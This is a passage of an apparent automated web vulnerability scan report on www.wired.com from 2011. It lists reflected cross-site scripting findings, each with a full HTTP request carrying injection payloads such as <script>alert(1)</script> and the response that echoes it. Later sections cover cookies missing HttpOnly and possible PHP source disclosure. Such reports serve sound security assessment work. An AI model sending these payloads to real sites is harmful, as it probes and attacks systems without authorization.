<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<script>alert(1)</script>b4ecd010e4e/threatlevel/kw=threatlevel
-->
...[SNIP]...

2.10. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wired.com
Path:	/services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6bfc8<script>alert(1)</script>41b5de530a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/dart/init/threatlevel/kw6bfc8<script>alert(1)</script>41b5de530a5=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/javascript; charset=UTF-8
Content-Length: 249
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 05:21:56 GMT
Date: Wed, 12 Jan 2011 05:11:56 GMT
Connection: close

CN.dart.init({site:'wiredcom.dart', zone: 'threatlevel;', kws:[ "kw6bfc8<script>alert(1)</script>41b5de530a5=threatlevel"], charmap : {' ' : '+', '-' : '_'}});

2.11. http://www.wired.com/user/login [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e6e4"><a>5dd758f037d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user6e6e4"><a>5dd758f037d/login HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28617
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:12:23 GMT
Date: Wed, 12 Jan 2011 05:08:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user6e6e4"><a>5dd758f037d ss_login">
...[SNIP]...

2.12. http://www.wired.com/user/login [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/login

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c812"><a>5f7d13f6048 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/login1c812"><a>5f7d13f6048 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28617
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:13:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:13:01 GMT
Connection: close
Set-Cookie: JSESSIONID=cabM-CK_HDwqVgt0cP41s; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_login1c812"><a>5f7d13f6048">
...[SNIP]...

2.13. http://www.wired.com/user/logout [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/logout

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7759e"><a>e2aad4de1c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user7759e"><a>e2aad4de1c1/logout HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28619
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:12:28 GMT
Date: Wed, 12 Jan 2011 05:08:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user7759e"><a>e2aad4de1c1 ss_logout">
...[SNIP]...

2.14. http://www.wired.com/user/logout [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/logout

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e31"><a>04439d0209d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/logout68e31"><a>04439d0209d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28619
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:12:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:12:54 GMT
Connection: close
Set-Cookie: JSESSIONID=abcwtLdaCQT637ylbP41s; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_logout68e31"><a>04439d0209d">
...[SNIP]...

2.15. http://www.wired.com/user/registration [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/registration

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6859"><a>f18010a37e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /usere6859"><a>f18010a37e9/registration HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28631
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:13:12 GMT
Date: Wed, 12 Jan 2011 05:09:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_usere6859"><a>f18010a37e9 ss_registration">
...[SNIP]...

2.16. http://www.wired.com/user/registration [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/registration

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eb8b"><a>e52b868ec54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/registration6eb8b"><a>e52b868ec54 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28631
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:13:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:13:15 GMT
Connection: close
Set-Cookie: JSESSIONID=acbOZw9Mr3a9Y7nkgP41s; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_user ss_registration6eb8b"><a>e52b868ec54">
...[SNIP]...

2.17. http://www.wired.com/video/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/video/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d31f0"><a>5e756706c49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videod31f0"><a>5e756706c49/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28605
Vary: Accept-Encoding
Cache-Control: max-age=292
Expires: Wed, 12 Jan 2011 05:12:52 GMT
Date: Wed, 12 Jan 2011 05:08:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videod31f0"><a>5e756706c49">
...[SNIP]...

2.18. http://www.wired.com/video/search/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/video/search/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d05"><a>3d4bdf06559 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videoc2d05"><a>3d4bdf06559/search/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28622
Vary: Accept-Encoding
Cache-Control: max-age=280
Expires: Wed, 12 Jan 2011 05:12:40 GMT
Date: Wed, 12 Jan 2011 05:08:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videoc2d05"><a>3d4bdf06559 ss_search">
...[SNIP]...

2.19. http://www.wired.com/video/search/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/video/search/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a6e"><a>13c7c111330 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/search32a6e"><a>13c7c111330/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=276
Expires: Wed, 12 Jan 2011 05:16:48 GMT
Date: Wed, 12 Jan 2011 05:12:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_search32a6e"><a>13c7c111330">
...[SNIP]...

2.20. http://www.wired.com/video/search/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wired.com
Path:	/video/search/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b2e3"-alert(1)-"1d49aac262e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/search3b2e3"-alert(1)-"1d49aac262e/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

3. Cookie without HttpOnly flag set previous next
There are 5 instances of this issue:

/services/corrections/
/services/newsletters
/user/login
/user/logout
/user/registration

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

3.1. http://www.wired.com/services/corrections/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.wired.com
Path:	/services/corrections/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=acbAOmv50QXE_5DZY461s; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/corrections/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 15:41:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:41:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=acbAOmv50QXE_5DZY461s; path=/
Content-Length: 54310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

3.2. http://www.wired.com/services/newsletters previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.wired.com
Path:	/services/newsletters

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=acbKlmpgDx9HsdHJY461s; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/newsletters HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 15:41:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:41:04 GMT
Content-Length: 31938
Connection: close
Set-Cookie: JSESSIONID=acbKlmpgDx9HsdHJY461s; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

3.3. http://www.wired.com/user/login previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=abcOkB-090FYf89-iN41s; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/login HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/login
Content-Length: 73
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:42 GMT
Connection: close
Set-Cookie: JSESSIONID=abcOkB-090FYf89-iN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/login">here</a>

3.4. http://www.wired.com/user/logout previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/logout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=cabyqTOw1aWnFbl3jN41s; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/logout HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/logout
Content-Length: 74
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:46 GMT
Connection: close
Set-Cookie: JSESSIONID=cabyqTOw1aWnFbl3jN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/logout">here</a>

3.5. http://www.wired.com/user/registration previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/registration

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=abcPb5WLVvrzQ952mN41s; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/registration HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/registration
Content-Length: 80
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=abcPb5WLVvrzQ952mN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/registration">here</a>

4. Source code disclosure previous next
There are 3 instances of this issue:

/magazine/
/magazine/ipad
/playbook/

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

4.1. http://www.wired.com/magazine/ previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.wired.com
Path:	/magazine/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /magazine/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/magazine/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 11:23:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:39:00 GMT
Date: Wed, 12 Jan 2011 15:39:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</li>

<?php wp_get_archives('type=postbypost&limit=10'); ?>
</ul>
<?php include (TEMPLATEPATH . "/most_recent_entries_supplement.php"); ?>
</div>
...[SNIP]...

